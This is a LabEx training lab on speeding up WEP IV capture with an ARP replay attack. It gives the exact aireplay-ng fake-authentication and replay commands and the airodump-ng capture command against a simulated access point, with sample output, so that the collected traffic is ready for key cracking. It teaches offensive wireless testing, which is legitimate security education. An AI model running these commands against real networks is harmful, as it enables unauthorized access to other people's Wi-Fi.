LabEx
Log InJoin Free

Accelerate WEP IV Capture with an ARP Replay Attack

Beginner
Practice Now

Introduction

Welcome to this lab on accelerating WEP IV capture. WEP (Wired Equivalent Privacy) is an outdated and insecure Wi-Fi security protocol. Its main weakness lies in the way it uses Initialization Vectors (IVs). To crack a WEP key, an attacker needs to capture a large number of data packets, each containing a unique IV.

Passively waiting for a network to generate enough traffic to capture tens of thousands of IVs can take hours or even days. To overcome this, we can use an active technique called an ARP Replay Attack. This attack involves capturing an ARP packet from the network and re-injecting (or "replaying") it back. This tricks the Access Point (AP) into generating a large volume of new packets, each with a new IV, allowing us to collect the necessary data in minutes.

In this lab, you will use the aireplay-ng tool from the Aircrack-ng suite to perform an ARP replay attack. We will assume you have already put your wireless card into monitor mode.

Perform a Fake Authentication with aireplay-ng -1

In this step, you will perform a "fake authentication" with the target Access Point (AP). Before we can inject any packets into the network, our device needs to be associated with the AP. The fake authentication attack establishes this association, making the AP believe we are a legitimate client.

For this lab, we will use the following simulated target information:

  • Interface: wlan0mon
  • ESSID (Network Name): labex-wep
  • BSSID (AP MAC Address): 00:11:22:33:44:55
  • Our MAC Address: 00:C0:CA:A1:B2:C3

Now, execute the following command in your terminal to perform the fake authentication. The -1 specifies the fake authentication attack, 0 sets the reassociation timing to automatic, -e specifies the ESSID, -a the BSSID, and -h our source MAC address.

sudo aireplay-ng -1 0 -e labex-wep -a 00:11:22:33:44:55 -h 00:C0:CA:A1:B2:C3 wlan0mon

In a real environment, you would see output indicating the progress. A successful execution will show messages like "Authentication successful" and "Association successful". Due to the limitations of the lab environment, the command may not produce the full, real-world output, but executing it is a crucial first step.

12:34:56  Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 6
12:34:56  Sending Authentication Request (Open System) [ACK]
12:34:57  Authentication successful
12:34:57  Sending Association Request [ACK]
12:34:57  Association successful :-) (AID: 1)

With the association established, we can proceed to the main attack.

Start the ARP Replay Attack with aireplay-ng -3

In this step, you will launch the ARP replay attack. This attack, specified by the -3 flag in aireplay-ng, listens for ARP packets on the network. Once it captures one, it will begin re-injecting it to generate a flood of new IVs.

It's important to run this attack in its own terminal window, as it will run continuously. Please open a new terminal for this command. You can do this by clicking the + icon in the terminal tab bar.

In the new terminal, execute the following command. The -3 flag initiates the ARP replay attack, -b specifies the target BSSID (the AP), and -h specifies our source MAC address (the one we used for authentication).

sudo aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:C0:CA:A1:B2:C3 wlan0mon

After running the command, aireplay-ng will start listening. The output will initially show that it is waiting for an ARP packet.

Saving ARP requests in replay_arp-1234-567890.cap
You should also start airodump-ng to capture replies.
Read 0 packets (got 0 ARP requests, 0 ACKs), sent 0 packets...(0 pps)

The tool is now passively listening. It needs to capture at least one ARP packet to begin the replay process. In the next step, we will set up a monitoring tool to watch our progress. Leave this terminal running.

Monitor the IV Capture with airodump-ng

In this step, you will use airodump-ng to monitor the network and, more importantly, to see the results of your ARP replay attack. airodump-ng will capture all the packets generated by the attack and save them to a file. The number of captured data packets (IVs) is the key metric of success.

This command also needs to run continuously in its own terminal. Please open a third terminal window by clicking the + icon again.

In this new terminal, run the following airodump-ng command.

  • --bssid: Focuses the capture on our target AP.
  • -c 6: Sets the channel to 6 (assuming the AP is on this channel).
  • --write wep_capture: Tells airodump-ng to save the captured packets into files with the prefix wep_capture.
  • wlan0mon: The monitor mode interface to use.
sudo airodump-ng --bssid 00:11:22:33:44:55 -c 6 --write wep_capture wlan0mon

After running the command, you will see the airodump-ng interface. Pay close attention to the #Data column for our target BSSID. This number represents the count of captured IVs.

 CH  6 ][ Elapsed: 0 s ][ 2023-10-27 10:10

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:11:22:33:44:55  -30       10        0    0   6  54   WEP  WEP         labex-wep

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

Initially, the #Data count will be zero or very low. Once the aireplay-ng attack (from Step 2) captures an ARP packet and starts injecting, you will see this number increase very rapidly. Leave this terminal running and proceed to the next step to understand the process.

Understand How ARP Replay Generates Injectable Traffic

This step is conceptual; you do not need to run any new commands. The goal is to understand what is happening across your three terminal windows.

In a real-world scenario, you would now wait for a legitimate client on the network to send an ARP request (e.g., when it first joins the network or tries to find another device).

  1. Capture: Your aireplay-ng -3 process (in the second terminal) is waiting for this to happen. Once it captures an ARP packet, its output will change. It will indicate that it has read a packet and is now saving it.

    Read 147 packets (got 1 ARP request), sent 0 packets...(0 pps)

  2. Replay: Immediately after capturing the ARP packet, aireplay-ng will start re-injecting it into the network. You will see the "sent" counter increase rapidly.

    Read 250 packets (got 1 ARP request), sent 86 packets...(102 pps)

  3. Generate: The AP receives these replayed ARP packets. For each one it receives, it broadcasts a reply. Each reply is encrypted with WEP and contains a new, unique IV.

  4. Monitor: Your airodump-ng process (in the third terminal) captures all these replies from the AP. You will see the #Data column for your target network start to skyrocket, often increasing by hundreds per second.

This feedback loop is the core of the attack. We use one captured ARP packet to trick the AP into generating thousands of new packets for us, dramatically accelerating the IV collection process.

Stop the Attack After Collecting over 20000 IVs

In this final step, you will stop the attack once you have collected a sufficient number of IVs. For cracking a WEP key, a common target is 20,000 to 40,000 IVs, although more may be needed depending on the key strength.

For this lab, we will stop once the count exceeds 20,000.

Watch the #Data column in your airodump-ng terminal (the third terminal you opened). Once the value is greater than 20,000, you can stop the capture and the attack.

To stop the processes, go to each of the two running terminals (airodump-ng and aireplay-ng) and press Ctrl+C. It's best to stop airodump-ng first to ensure all packets are written to the file.

After stopping the processes, the airodump-ng command will have created several files in your ~/project directory. The most important one is the capture file, which ends in .cap. Let's list the files to confirm it was created.

ls -l

You should see output similar to this, confirming the presence of wep_capture-01.cap.

-rw-r--r-- 1 root root 2450000 Oct 27 10:15 wep_capture-01.cap
-rw-r--r-- 1 root root   78123 Oct 27 10:15 wep_capture-01.csv
...

This .cap file contains all the IVs you have collected and is now ready to be used with aircrack-ng to crack the WEP key.

Summary

In this lab, you have successfully learned how to perform one of the most effective attacks against WEP-protected networks.

You started by performing a fake authentication with aireplay-ng -1 to associate your device with the target Access Point. Then, you launched the core of the lab, the ARP replay attack using aireplay-ng -3, which listens for and replays ARP packets. You also set up airodump-ng to monitor the network and capture the resulting traffic.

You learned how this attack creates a feedback loop, tricking the AP into generating thousands of new data packets (IVs) per minute. Finally, you stopped the attack after collecting a sufficient number of IVs, resulting in a .cap file ready for cracking. This active technique is vastly more efficient than passively waiting for network traffic. The next logical step, which is outside the scope of this lab, would be to use aircrack-ng on the wep_capture-01.cap file to recover the WEP key.